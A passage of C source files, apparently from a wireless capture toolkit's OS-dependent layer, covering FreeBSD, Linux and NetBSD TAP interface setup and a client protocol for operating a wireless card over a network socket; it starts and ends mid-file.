217 | int rc; 218 | 219 | if (strncmp(iface, "file://", 7) != 0) 220 | return NULL; 221 | 222 | /* setup wi struct */ 223 | wi = wi_alloc(sizeof(*pf)); 224 | if (!wi) 225 | return NULL; 226 | 227 | wi->wi_read = file_read; 228 | wi->wi_write = file_write; 229 | wi->wi_set_channel = file_set_channel; 230 | wi->wi_get_channel = file_get_channel; 231 | wi->wi_set_rate = file_set_rate; 232 | wi->wi_get_rate = file_get_rate; 233 | wi->wi_close = file_close; 234 | wi->wi_fd = file_fd; 235 | wi->wi_get_mac = file_get_mac; 236 | wi->wi_get_monitor = file_get_monitor; 237 | 238 | pf = wi_priv(wi); 239 | 240 | fd = open(iface + 7, O_RDONLY); 241 | if (fd == -1) 242 | err(1, "open()"); 243 | 244 | pf->pf_fd = fd; 245 | 246 | if ((rc = read(fd, &pfh, sizeof(pfh))) != sizeof(pfh)) 247 | goto __err; 248 | 249 | if (pfh.magic != TCPDUMP_MAGIC) 250 | goto __err; 251 | 252 | if (pfh.version_major != PCAP_VERSION_MAJOR 253 | || pfh.version_minor != PCAP_VERSION_MINOR) 254 | goto __err; 255 | 256 | pf->pf_dtl = pfh.linktype; 257 | 258 | return wi; 259 | 260 | __err: 261 | wi_close(wi); 262 | return (struct wif*) -1; 263 | } 264 | -------------------------------------------------------------------------------- /osdep/freebsd_tap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007, 2008, Andrea Bittau 3 | * 4 | * OS dependent API for FreeBSD. TAP routines 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | 34 | #include "osdep.h" 35 | 36 | struct tip_fbsd { 37 | int tf_fd; 38 | int tf_ioctls; 39 | struct ifreq tf_ifr; 40 | char tf_name[MAX_IFACE_NAME]; 41 | int tf_destroy; 42 | }; 43 | 44 | static int ti_do_open_fbsd(struct tif *ti, char *name) 45 | { 46 | int fd; 47 | char *iface = "/dev/tap"; 48 | struct stat st; 49 | struct tip_fbsd *priv = ti_priv(ti); 50 | int s; 51 | unsigned int flags; 52 | struct ifreq *ifr; 53 | 54 | /* open tap */ 55 | if (name) 56 | iface = name; 57 | else 58 | priv->tf_destroy = 1; /* we create, we destroy */ 59 | 60 | fd = open(iface, O_RDWR); 61 | if (fd == -1) 62 | return -1; 63 | 64 | /* get name */ 65 | if(fstat(fd, &st) == -1) 66 | goto err; 67 | snprintf(priv->tf_name, sizeof(priv->tf_name)-1, "%s", 68 | devname(st.st_rdev, S_IFCHR)); 69 | 70 | /* bring iface up */ 71 | s = socket(PF_INET, SOCK_DGRAM, 0); 72 | if (s == -1) 73 | goto err; 74 | priv->tf_ioctls = s; 75 | 76 | /* get flags */ 77 | ifr = &priv->tf_ifr; 78 | memset(ifr, 0, sizeof(*ifr)); 79 | snprintf(ifr->ifr_name, sizeof(ifr->ifr_name)-1, "%s", priv->tf_name); 80 | if (ioctl(s, SIOCGIFFLAGS, ifr) == -1) 81 | goto err2; 82 | flags = (ifr->ifr_flags & 0xffff) | (ifr->ifr_flagshigh << 16); 83 | 84 | /* set flags */ 85 | flags |= IFF_UP; 86 | ifr->ifr_flags = flags & 0xffff; 87 | ifr->ifr_flagshigh = flags >> 16; 88 | if (ioctl(s, SIOCSIFFLAGS, ifr) == -1) 89 | goto err2; 90 | 91 | return fd; 92 | err: 93 | /* XXX destroy */ 94 | close(fd); 95 | return -1; 96 | err2: 97 | close(s); 98 | goto err; 99 | } 100 | 101 | static void ti_do_free(struct tif *ti) 102 | { 103 | struct tip_fbsd *priv = ti_priv(ti); 104 | 105 | free(priv); 106 | free(ti); 107 | } 108 | 109 | static void ti_destroy(struct tip_fbsd *priv) 110 | { 111 | ioctl(priv->tf_ioctls, SIOCIFDESTROY, &priv->tf_ifr); 112 | } 113 | 114 | static void ti_close_fbsd(struct tif *ti) 115 | { 116 | struct tip_fbsd *priv = ti_priv(ti); 117 | 118 | if (priv->tf_destroy) 119 | ti_destroy(priv); 120 | 121 | close(priv->tf_fd); 122 | close(priv->tf_ioctls); 123 | ti_do_free(ti); 124 | } 125 | 126 | static char *ti_name_fbsd(struct tif *ti) 127 | { 128 | struct tip_fbsd *priv = ti_priv(ti); 129 | 130 | return priv->tf_name; 131 | } 132 | 133 | static int ti_set_mtu_fbsd(struct tif *ti, int mtu) 134 | { 135 | struct tip_fbsd *priv = ti_priv(ti); 136 | 137 | priv->tf_ifr.ifr_mtu = mtu; 138 | 139 | return ioctl(priv->tf_ioctls, SIOCSIFMTU, &priv->tf_ifr); 140 | } 141 | 142 | static int ti_set_mac_fbsd(struct tif *ti, unsigned char *mac) 143 | { 144 | struct tip_fbsd *priv = ti_priv(ti); 145 | struct ifreq *ifr = &priv->tf_ifr; 146 | 147 | ifr->ifr_addr.sa_family = AF_LINK; 148 | ifr->ifr_addr.sa_len = 6; 149 | memcpy(ifr->ifr_addr.sa_data, mac, 6); 150 | 151 | return ioctl(priv->tf_ioctls, SIOCSIFLLADDR, ifr); 152 | } 153 | 154 | static int ti_set_ip_fbsd(struct tif *ti, struct in_addr *ip) 155 | { 156 | struct tip_fbsd *priv = ti_priv(ti); 157 | struct ifaliasreq ifra; 158 | struct sockaddr_in *s_in; 159 | 160 | /* assume same size */ 161 | memset(&ifra, 0, sizeof(ifra)); 162 | strcpy(ifra.ifra_name, priv->tf_ifr.ifr_name); 163 | 164 | s_in = (struct sockaddr_in *) &ifra.ifra_addr; 165 | s_in->sin_family = PF_INET; 166 | s_in->sin_addr = *ip; 167 | s_in->sin_len = sizeof(*s_in); 168 | 169 | return ioctl(priv->tf_ioctls, SIOCAIFADDR, &ifra); 170 | } 171 | 172 | static int ti_fd_fbsd(struct tif *ti) 173 | { 174 | struct tip_fbsd *priv = ti_priv(ti); 175 | 176 | return priv->tf_fd; 177 | } 178 | 179 | static int ti_read_fbsd(struct tif *ti, void *buf, int len) 180 | { 181 | return read(ti_fd(ti), buf, len); 182 | } 183 | 184 | static int ti_write_fbsd(struct tif *ti, void *buf, int len) 185 | { 186 | return write(ti_fd(ti), buf, len); 187 | } 188 | 189 | static struct tif *ti_open_fbsd(char *iface) 190 | { 191 | struct tif *ti; 192 | struct tip_fbsd *priv; 193 | int fd; 194 | 195 | /* setup ti struct */ 196 | ti = ti_alloc(sizeof(*priv)); 197 | if (!ti) 198 | return NULL; 199 | ti->ti_name = ti_name_fbsd; 200 | ti->ti_set_mtu = ti_set_mtu_fbsd; 201 | ti->ti_close = ti_close_fbsd; 202 | ti->ti_fd = ti_fd_fbsd; 203 | ti->ti_read = ti_read_fbsd; 204 | ti->ti_write = ti_write_fbsd; 205 | ti->ti_set_mac = ti_set_mac_fbsd; 206 | ti->ti_set_ip = ti_set_ip_fbsd; 207 | 208 | /* setup iface */ 209 | fd = ti_do_open_fbsd(ti, iface); 210 | if (fd == -1) { 211 | ti_do_free(ti); 212 | return NULL; 213 | } 214 | 215 | /* setup private state */ 216 | priv = ti_priv(ti); 217 | priv->tf_fd = fd; 218 | 219 | return ti; 220 | } 221 | 222 | struct tif *ti_open(char *iface) 223 | { 224 | return ti_open_fbsd(iface); 225 | } 226 | -------------------------------------------------------------------------------- /osdep/linux_tap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007, 2008, Andrea Bittau 3 | * 4 | * OS dependent API for Linux. TAP routines 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | 38 | #include "osdep.h" 39 | 40 | struct tip_linux { 41 | int tl_fd; 42 | struct ifreq tl_ifr; 43 | int tl_ioctls; 44 | char tl_name[MAX_IFACE_NAME]; 45 | }; 46 | 47 | static int ti_do_open_linux(struct tif *ti, char *name) 48 | { 49 | int fd_tap; 50 | struct ifreq if_request; 51 | struct tip_linux *priv = ti_priv(ti); 52 | 53 | fd_tap = open( name ? name : "/dev/net/tun", O_RDWR ); 54 | if(fd_tap < 0 ) 55 | { 56 | printf( "error opening tap device: %s\n", strerror( errno ) ); 57 | printf( "try \"modprobe tun\"\n"); 58 | return -1; 59 | } 60 | 61 | memset( &if_request, 0, sizeof( if_request ) ); 62 | if_request.ifr_flags = IFF_TAP | IFF_NO_PI; 63 | strncpy( if_request.ifr_name, "at%d", IFNAMSIZ ); 64 | if( ioctl( fd_tap, TUNSETIFF, (void *)&if_request ) < 0 ) 65 | { 66 | printf( "error creating tap interface: %s\n", strerror( errno ) ); 67 | close( fd_tap ); 68 | return -1; 69 | } 70 | 71 | strncpy( priv->tl_name, if_request.ifr_name, MAX_IFACE_NAME ); 72 | strncpy(priv->tl_ifr.ifr_name, priv->tl_name, 73 | sizeof(priv->tl_ifr.ifr_name) - 1); 74 | 75 | if ((priv->tl_ioctls = socket(PF_INET, SOCK_DGRAM, 0)) == -1) { 76 | priv->tl_ioctls = 0; 77 | close(fd_tap); 78 | return -1; 79 | } 80 | 81 | return fd_tap; 82 | } 83 | 84 | static void ti_do_free(struct tif *ti) 85 | { 86 | struct tip_fbsd *priv = ti_priv(ti); 87 | 88 | free(priv); 89 | free(ti); 90 | } 91 | 92 | static void ti_close_linux(struct tif *ti) 93 | { 94 | struct tip_linux *priv = ti_priv(ti); 95 | 96 | close(priv->tl_fd); 97 | close(priv->tl_ioctls); 98 | ti_do_free(ti); 99 | } 100 | 101 | static char *ti_name_linux(struct tif *ti) 102 | { 103 | struct tip_linux *priv = ti_priv(ti); 104 | 105 | return priv->tl_name; 106 | } 107 | 108 | static int ti_set_mtu_linux(struct tif *ti, int mtu) 109 | { 110 | struct tip_linux *priv = ti_priv(ti); 111 | 112 | priv->tl_ifr.ifr_mtu = mtu; 113 | 114 | return ioctl(priv->tl_ioctls, SIOCSIFMTU, &priv->tl_ifr); 115 | } 116 | 117 | static int ti_get_mtu_linux(struct tif *ti) 118 | { 119 | int mtu; 120 | struct tip_linux *priv = ti_priv(ti); 121 | 122 | if (ioctl(priv->tl_ioctls, SIOCSIFMTU, &priv->tl_ifr) != -1){ 123 | mtu = priv->tl_ifr.ifr_mtu; 124 | } 125 | else{ 126 | mtu = 1500; 127 | } 128 | 129 | return mtu; 130 | } 131 | 132 | static int ti_set_mac_linux(struct tif *ti, unsigned char *mac) 133 | { 134 | struct tip_linux *priv = ti_priv(ti); 135 | 136 | memcpy(priv->tl_ifr.ifr_hwaddr.sa_data, mac, 6); 137 | priv->tl_ifr.ifr_hwaddr.sa_family = ARPHRD_ETHER; 138 | 139 | return ioctl(priv->tl_ioctls, SIOCSIFHWADDR, &priv->tl_ifr); 140 | } 141 | 142 | static int ti_set_ip_linux(struct tif *ti, struct in_addr *ip) 143 | { 144 | struct tip_linux *priv = ti_priv(ti); 145 | struct sockaddr_in *s_in; 146 | 147 | s_in = (struct sockaddr_in*) &priv->tl_ifr.ifr_addr; 148 | s_in->sin_family = AF_INET; 149 | s_in->sin_addr = *ip; 150 | 151 | return ioctl(priv->tl_ioctls, SIOCSIFADDR, &priv->tl_ifr); 152 | } 153 | 154 | static int ti_fd_linux(struct tif *ti) 155 | { 156 | struct tip_linux *priv = ti_priv(ti); 157 | 158 | return priv->tl_fd; 159 | } 160 | 161 | static int ti_read_linux(struct tif *ti, void *buf, int len) 162 | { 163 | return read(ti_fd(ti), buf, len); 164 | } 165 | 166 | static int ti_write_linux(struct tif *ti, void *buf, int len) 167 | { 168 | return write(ti_fd(ti), buf, len); 169 | } 170 | 171 | static struct tif *ti_open_linux(char *iface) 172 | { 173 | struct tif *ti; 174 | struct tip_linux *priv; 175 | int fd; 176 | 177 | /* setup ti struct */ 178 | ti = ti_alloc(sizeof(*priv)); 179 | if (!ti) 180 | return NULL; 181 | ti->ti_name = ti_name_linux; 182 | ti->ti_set_mtu = ti_set_mtu_linux; 183 | ti->ti_get_mtu = ti_get_mtu_linux; 184 | ti->ti_close = ti_close_linux; 185 | ti->ti_fd = ti_fd_linux; 186 | ti->ti_read = ti_read_linux; 187 | ti->ti_write = ti_write_linux; 188 | ti->ti_set_mac = ti_set_mac_linux; 189 | ti->ti_set_ip = ti_set_ip_linux; 190 | 191 | /* setup iface */ 192 | fd = ti_do_open_linux(ti, iface); 193 | if (fd == -1) { 194 | ti_do_free(ti); 195 | return NULL; 196 | } 197 | 198 | /* setup private state */ 199 | priv = ti_priv(ti); 200 | priv->tl_fd = fd; 201 | 202 | return ti; 203 | } 204 | 205 | struct tif *ti_open(char *iface) 206 | { 207 | return ti_open_linux(iface); 208 | } 209 | -------------------------------------------------------------------------------- /osdep/netbsd_tap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007, 2008, Andrea Bittau 3 | * 4 | * OS dependent API for NetBSD. TAP routines 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | 33 | #include "osdep.h" 34 | 35 | struct tip_nbsd { 36 | int tn_fd; 37 | int tn_ioctls; 38 | struct ifreq tn_ifr; 39 | char tn_name[MAX_IFACE_NAME]; 40 | int tn_destroy; 41 | }; 42 | 43 | static int ti_do_open_nbsd(struct tif *ti, char *name) 44 | { 45 | int fd; 46 | char *iface = "/dev/tap"; 47 | struct stat st; 48 | struct tip_nbsd *priv = ti_priv(ti); 49 | int s; 50 | unsigned int flags; 51 | struct ifreq *ifr; 52 | 53 | /* open tap */ 54 | if (name) 55 | iface = name; 56 | else 57 | priv->tn_destroy = 1; /* we create, we destroy */ 58 | 59 | fd = open(iface, O_RDWR); 60 | if (fd == -1) 61 | return -1; 62 | 63 | /* get name */ 64 | if(fstat(fd, &st) == -1) 65 | goto err; 66 | snprintf(priv->tn_name, sizeof(priv->tn_name)-1, "%s", 67 | devname(st.st_rdev, S_IFCHR)); 68 | 69 | /* bring iface up */ 70 | s = socket(PF_INET, SOCK_DGRAM, 0); 71 | if (s == -1) 72 | goto err; 73 | priv->tn_ioctls = s; 74 | 75 | /* get flags */ 76 | ifr = &priv->tn_ifr; 77 | memset(ifr, 0, sizeof(*ifr)); 78 | snprintf(ifr->ifr_name, sizeof(ifr->ifr_name)-1, "%s", priv->tn_name); 79 | if (ioctl(s, SIOCGIFFLAGS, ifr) == -1) 80 | goto err2; 81 | flags = ifr->ifr_flags; 82 | 83 | /* set flags */ 84 | flags |= IFF_UP; 85 | ifr->ifr_flags = flags & 0xffff; 86 | if (ioctl(s, SIOCSIFFLAGS, ifr) == -1) 87 | goto err2; 88 | 89 | return fd; 90 | err: 91 | /* XXX destroy */ 92 | close(fd); 93 | return -1; 94 | err2: 95 | close(s); 96 | goto err; 97 | } 98 | 99 | static void ti_do_free(struct tif *ti) 100 | { 101 | struct tip_nbsd *priv = ti_priv(ti); 102 | 103 | free(priv); 104 | free(ti); 105 | } 106 | 107 | static void ti_destroy(struct tip_nbsd *priv) 108 | { 109 | ioctl(priv->tn_ioctls, SIOCIFDESTROY, &priv->tn_ifr); 110 | } 111 | 112 | static void ti_close_nbsd(struct tif *ti) 113 | { 114 | struct tip_nbsd *priv = ti_priv(ti); 115 | 116 | if (priv->tn_destroy) 117 | ti_destroy(priv); 118 | 119 | close(priv->tn_fd); 120 | close(priv->tn_ioctls); 121 | ti_do_free(ti); 122 | } 123 | 124 | static char *ti_name_nbsd(struct tif *ti) 125 | { 126 | struct tip_nbsd *priv = ti_priv(ti); 127 | 128 | return priv->tn_name; 129 | } 130 | 131 | static int ti_set_mtu_nbsd(struct tif *ti, int mtu) 132 | { 133 | struct tip_nbsd *priv = ti_priv(ti); 134 | 135 | priv->tn_ifr.ifr_mtu = mtu; 136 | 137 | return ioctl(priv->tn_ioctls, SIOCSIFMTU, &priv->tn_ifr); 138 | } 139 | 140 | static int ti_set_mac_nbsd(struct tif *ti, unsigned char *mac) 141 | { 142 | struct tip_nbsd *priv = ti_priv(ti); 143 | struct ifreq *ifr = &priv->tn_ifr; 144 | 145 | ifr->ifr_addr.sa_family = AF_LINK; 146 | ifr->ifr_addr.sa_len = 6; 147 | memcpy(ifr->ifr_addr.sa_data, mac, 6); 148 | 149 | return ioctl(priv->tn_ioctls, SIOCSIFADDR, ifr); 150 | } 151 | 152 | static int ti_set_ip_nbsd(struct tif *ti, struct in_addr *ip) 153 | { 154 | struct tip_nbsd *priv = ti_priv(ti); 155 | struct ifaliasreq ifra; 156 | struct sockaddr_in *s_in; 157 | 158 | /* assume same size */ 159 | memset(&ifra, 0, sizeof(ifra)); 160 | strncpy(ifra.ifra_name, priv->tn_ifr.ifr_name, IFNAMSIZ); 161 | 162 | s_in = (struct sockaddr_in *) &ifra.ifra_addr; 163 | s_in->sin_family = PF_INET; 164 | s_in->sin_addr = *ip; 165 | s_in->sin_len = sizeof(*s_in); 166 | 167 | return ioctl(priv->tn_ioctls, SIOCAIFADDR, &ifra); 168 | } 169 | 170 | static int ti_fd_nbsd(struct tif *ti) 171 | { 172 | struct tip_nbsd *priv = ti_priv(ti); 173 | 174 | return priv->tn_fd; 175 | } 176 | 177 | static int ti_read_nbsd(struct tif *ti, void *buf, int len) 178 | { 179 | return read(ti_fd(ti), buf, len); 180 | } 181 | 182 | static int ti_write_nbsd(struct tif *ti, void *buf, int len) 183 | { 184 | return write(ti_fd(ti), buf, len); 185 | } 186 | 187 | static struct tif *ti_open_nbsd(char *iface) 188 | { 189 | struct tif *ti; 190 | struct tip_nbsd *priv; 191 | int fd; 192 | 193 | /* setup ti struct */ 194 | ti = ti_alloc(sizeof(*priv)); 195 | if (!ti) 196 | return NULL; 197 | ti->ti_name = ti_name_nbsd; 198 | ti->ti_set_mtu = ti_set_mtu_nbsd; 199 | ti->ti_close = ti_close_nbsd; 200 | ti->ti_fd = ti_fd_nbsd; 201 | ti->ti_read = ti_read_nbsd; 202 | ti->ti_write = ti_write_nbsd; 203 | ti->ti_set_mac = ti_set_mac_nbsd; 204 | ti->ti_set_ip = ti_set_ip_nbsd; 205 | 206 | /* setup iface */ 207 | fd = ti_do_open_nbsd(ti, iface); 208 | if (fd == -1) { 209 | ti_do_free(ti); 210 | return NULL; 211 | } 212 | 213 | /* setup private state */ 214 | priv = ti_priv(ti); 215 | priv->tn_fd = fd; 216 | 217 | return ti; 218 | } 219 | 220 | struct tif *ti_open(char *iface) 221 | { 222 | return ti_open_nbsd(iface); 223 | } 224 | -------------------------------------------------------------------------------- /osdep/network.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007, 2008, Andrea Bittau 3 | * 4 | * OS dependent API for using card via network. 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | 33 | #include "osdep.h" 34 | #include "network.h" 35 | 36 | #define QUEUE_MAX 666 37 | 38 | struct netqueue { 39 | unsigned char q_buf[2048]; 40 | int q_len; 41 | 42 | struct netqueue *q_next; 43 | struct netqueue *q_prev; 44 | }; 45 | 46 | struct priv_net { 47 | int pn_s; 48 | struct netqueue pn_queue; 49 | struct netqueue pn_queue_free; 50 | int pn_queue_len; 51 | }; 52 | 53 | int net_send(int s, int command, void *arg, int len) 54 | { 55 | struct net_hdr *pnh; 56 | char *pktbuf; 57 | size_t pktlen; 58 | 59 | pktlen = sizeof(struct net_hdr) + len; 60 | 61 | pktbuf = (char*)calloc(sizeof(char), pktlen); 62 | if (pktbuf == NULL) { 63 | perror("calloc"); 64 | goto net_send_error; 65 | } 66 | 67 | pnh = (struct net_hdr*)pktbuf; 68 | pnh->nh_type = command; 69 | pnh->nh_len = htonl(len); 70 | 71 | memcpy(pktbuf + sizeof(struct net_hdr), arg, len); 72 | 73 | for (;;) { 74 | ssize_t rc = send(s, pktbuf, pktlen, 0); 75 | 76 | if ((size_t)rc == pktlen) 77 | break; 78 | 79 | if (rc == EAGAIN || rc == EWOULDBLOCK || rc == EINTR) 80 | continue; 81 | 82 | if (rc == ECONNRESET) 83 | printf("Connection reset while sending packet!\n"); 84 | 85 | goto net_send_error; 86 | } 87 | 88 | free(pktbuf); 89 | return 0; 90 | 91 | net_send_error: 92 | free(pktbuf); 93 | return -1; 94 | } 95 | 96 | int net_read_exact(int s, void *arg, int len) 97 | { 98 | ssize_t rc; 99 | int rlen = 0; 100 | char *buf = (char*)arg; 101 | while (rlen < len) { 102 | rc = recv(s, buf, (len - rlen), 0); 103 | 104 | if (rc < 1) { 105 | if (rc == -1 && (errno == EAGAIN || errno == EINTR)) { 106 | usleep(100); 107 | continue; 108 | } 109 | 110 | return -1; 111 | } 112 | 113 | buf += rc; 114 | rlen += rc; 115 | } 116 | 117 | return 0; 118 | } 119 | 120 | int net_get(int s, void *arg, int *len) 121 | { 122 | struct net_hdr nh; 123 | int plen; 124 | 125 | if (net_read_exact(s, &nh, sizeof(nh)) == -1) 126 | { 127 | return -1; 128 | } 129 | 130 | plen = ntohl(nh.nh_len); 131 | if (!(plen <= *len)) 132 | printf("PLEN %d type %d len %d\n", 133 | plen, nh.nh_type, *len); 134 | assert(plen <= *len && plen >= 0); 135 | 136 | *len = plen; 137 | if ((*len) && (net_read_exact(s, arg, *len) == -1)) 138 | { 139 | return -1; 140 | } 141 | 142 | return nh.nh_type; 143 | } 144 | 145 | static void queue_del(struct netqueue *q) 146 | { 147 | q->q_prev->q_next = q->q_next; 148 | q->q_next->q_prev = q->q_prev; 149 | } 150 | 151 | static void queue_add(struct netqueue *head, struct netqueue *q) 152 | { 153 | struct netqueue *pos = head->q_prev; 154 | 155 | q->q_prev = pos; 156 | q->q_next = pos->q_next; 157 | q->q_next->q_prev = q; 158 | pos->q_next = q; 159 | } 160 | 161 | #if 0 162 | static int queue_len(struct netqueue *head) 163 | { 164 | struct netqueue *q = head->q_next; 165 | int i = 0; 166 | 167 | while (q != head) { 168 | i++; 169 | q = q->q_next; 170 | } 171 | 172 | return i; 173 | } 174 | #endif 175 | 176 | static struct netqueue *queue_get_slot(struct priv_net *pn) 177 | { 178 | struct netqueue *q = pn->pn_queue_free.q_next; 179 | 180 | if (q != &pn->pn_queue_free) { 181 | queue_del(q); 182 | return q; 183 | } 184 | 185 | if (pn->pn_queue_len++ > QUEUE_MAX) 186 | return NULL; 187 | 188 | return malloc(sizeof(*q)); 189 | } 190 | 191 | static void net_enque(struct priv_net *pn, void *buf, int len) 192 | { 193 | struct netqueue *q; 194 | 195 | q = queue_get_slot(pn); 196 | if (!q) 197 | return; 198 | 199 | q->q_len = len; 200 | assert((int) sizeof(q->q_buf) >= q->q_len); 201 | memcpy(q->q_buf, buf, q->q_len); 202 | queue_add(&pn->pn_queue, q); 203 | } 204 | 205 | static int net_get_nopacket(struct priv_net *pn, void *arg, int *len) 206 | { 207 | unsigned char buf[2048]; 208 | int l = sizeof(buf); 209 | int c; 210 | 211 | while (1) { 212 | l = sizeof(buf); 213 | c = net_get(pn->pn_s, buf, &l); 214 | if (c < 0) 215 | return c; 216 | 217 | if (c != NET_PACKET && c > 0) 218 | break; 219 | 220 | if(c > 0) 221 | net_enque(pn, buf, l); 222 | } 223 | 224 | assert(l <= *len); 225 | memcpy(arg, buf, l); 226 | *len = l; 227 | 228 | return c; 229 | } 230 | 231 | static int net_cmd(struct priv_net *pn, int command, void *arg, int alen) 232 | { 233 | uint32_t rc; 234 | int len; 235 | int cmd; 236 | 237 | if (net_send(pn->pn_s, command, arg, alen) == -1) 238 | { 239 | return -1; 240 | } 241 | 242 | len = sizeof(rc); 243 | cmd = net_get_nopacket(pn, &rc, &len); 244 | if (cmd == -1) 245 | { 246 | return -1; 247 | } 248 | assert(cmd == NET_RC); 249 | assert(len == sizeof(rc)); 250 | 251 | return ntohl(rc); 252 | } 253 | 254 | static int queue_get(struct priv_net *pn, void *buf, int len) 255 | { 256 | struct netqueue *head = &pn->pn_queue; 257 | struct netqueue *q = head->q_next; 258 | 259 | if (q == head) 260 | return 0; 261 | 262 | assert(q->q_len <= len); 263 | memcpy(buf, q->q_buf, q->q_len); 264 | 265 | queue_del(q); 266 | queue_add(&pn->pn_queue_free, q); 267 | 268 | return q->q_len; 269 | } 270 | 271 | static int net_read(struct wif *wi, unsigned char *h80211, int len, 272 | struct rx_info *ri) 273 | { 274 | struct priv_net *pn = wi_priv(wi); 275 | uint32_t buf[512]; // 512 * 4 = 2048 276 | unsigned char *bufc = (unsigned char*)buf; 277 | int cmd; 278 | int sz = sizeof(*ri); 279 | int l; 280 | int ret; 281 | 282 | /* try queue */ 283 | l = queue_get(pn, buf, sizeof(buf)); 284 | if (!l) { 285 | /* try reading form net */ 286 | l = sizeof(buf); 287 | cmd = net_get(pn->pn_s, buf, &l); 288 | 289 | if (cmd == -1) 290 | return -1; 291 | if (cmd == NET_RC) 292 | { 293 | ret = ntohl((buf[0])); 294 | return ret; 295 | } 296 | assert(cmd == NET_PACKET); 297 | } 298 | 299 | /* XXX */ 300 | if (ri) { 301 | // re-assemble 64-bit integer 302 | ri->ri_mactime = __be64_to_cpu(((uint64_t)buf[0] << 32 || buf[1] )); 303 | ri->ri_power = __be32_to_cpu(buf[2]); 304 | ri->ri_noise = __be32_to_cpu(buf[3]); 305 | ri->ri_channel = __be32_to_cpu(buf[4]); 306 | ri->ri_freq = __be32_to_cpu(buf[5]); 307 | ri->ri_rate = __be32_to_cpu(buf[6]); 308 | ri->ri_antenna = __be32_to_cpu(buf[7]); 309 | } 310 | l -= sz; 311 | assert(l > 0); 312 | if (l > len) 313 | l = len; 314 | memcpy(h80211, &bufc[sz], l); 315 | 316 | return l; 317 | } 318 | 319 | static int net_get_mac(struct wif *wi, unsigned char *mac) 320 | { 321 | struct priv_net *pn = wi_priv(wi); 322 | uint32_t buf[2]; // only need 6 bytes, this provides 8 323 | int cmd; 324 | int sz = 6; 325 | 326 | if (net_send(pn->pn_s, NET_GET_MAC, NULL, 0) == -1) 327 | return -1; 328 | 329 | cmd = net_get_nopacket(pn, buf, &sz); 330 | if (cmd == -1) 331 | return -1; 332 | if (cmd == NET_RC) 333 | return ntohl(buf[0]); 334 | assert(cmd == NET_MAC); 335 | assert(sz == 6); 336 | 337 | memcpy(mac, buf, 6); 338 | 339 | return 0; 340 | } 341 | 342 | static int net_write(struct wif *wi, unsigned char *h80211, int len, 343 | struct tx_info *ti) 344 | { 345 | struct priv_net *pn = wi_priv(wi); 346 | int sz = sizeof(*ti); 347 | unsigned char buf[2048]; 348 | unsigned char *ptr = buf; 349 | 350 | /* XXX */ 351 | if (ti) 352 | memcpy(ptr, ti, sz); 353 | else 354 | memset(ptr, 0, sizeof(*ti)); 355 | 356 | ptr += sz; 357 | memcpy(ptr, h80211, len); 358 | sz += len; 359 | 360 | return net_cmd(pn, NET_WRITE, buf, sz); 361 | } 362 | 363 | static int net_set_channel(struct wif *wi, int chan) 364 | { 365 | uint32_t c = htonl(chan); 366 | 367 | return net_cmd(wi_priv(wi), NET_SET_CHAN, &c, sizeof(c)); 368 | } 369 | 370 | static int net_get_channel(struct wif *wi) 371 | { 372 | struct priv_net *pn = wi_priv(wi); 373 | 374 | return net_cmd(pn, NET_GET_CHAN, NULL, 0); 375 | } 376 | 377 | static int net_set_rate(struct wif *wi, int rate) 378 | { 379 | uint32_t c = htonl(rate); 380 | 381 | return net_cmd(wi_priv(wi), NET_SET_RATE, &c, sizeof(c)); 382 | } 383 | 384 | static int net_get_rate(struct wif *wi) 385 | 